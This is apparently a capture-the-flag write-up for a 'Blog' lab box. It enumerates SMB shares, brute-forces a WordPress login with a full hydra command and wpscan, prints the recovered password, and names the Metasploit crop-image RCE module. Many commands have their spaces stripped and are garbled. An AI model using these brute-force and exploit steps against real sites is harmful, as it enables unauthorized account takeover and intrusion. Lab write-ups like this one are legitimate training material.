đ Billy Joel made a blog on his home computer and has started working on it. It's going to be so awesome!Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole... In order to get the blog to work with AWS, you'll need to add blog.thm to your /etc/hosts file.
Target IP
Add blog.thm to the /etc/hosts file
suecho" blog.thm">>/etc/hosts# At the end of the room# To clean up the last line from the /etc/hosts filesed-i'$ d'/etc/hosts
nmap-p445--scriptsmb-protocolsblog.thm|smb-protocols:|dialects:|NTLM0.12 (SMBv1) [dangerous, but default]|202|210|300|302|_311smbmap-uguest-p""-d.-Hblog.thmsmbclient-Lblog.thm-Nsmbclient//blog.thm/BillySMB-Ngetcheck-this.png# This looks like a rabbit hole
This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post.
Since Karen Wheeler has author access to the blog, brute force the user kwheel.
Navigate to http://blog.thm/wp-login.php and try a password with user kwheel. Copy the HTTP POST request in raw format, it is necessary for the Hydra command.
hydra -l kwheel -P /usr/share/wordlists/rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.54.35%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V
# Third string is the test condition, F: = test for failure. String got from the HTTP response.# WPScanecho-e'kwheel'>user.txtwpscan--urlhttp://blog.thm-P/usr/share/wordlists/rockyou.txt-Uuser.txt-t75
đ kwheeler:cutiepie1
Use Metasploit with module exploit/multi/http/wp_crop_rce
shellscript-qc/bin/bash/dev/nullfind/-typef-inameuser.txt2>/dev/nullls/home/bjoel/cat/home/bjoel/user.txtYouwon't find what you'relookingforhere.TRYHARDERexit# to exit the shell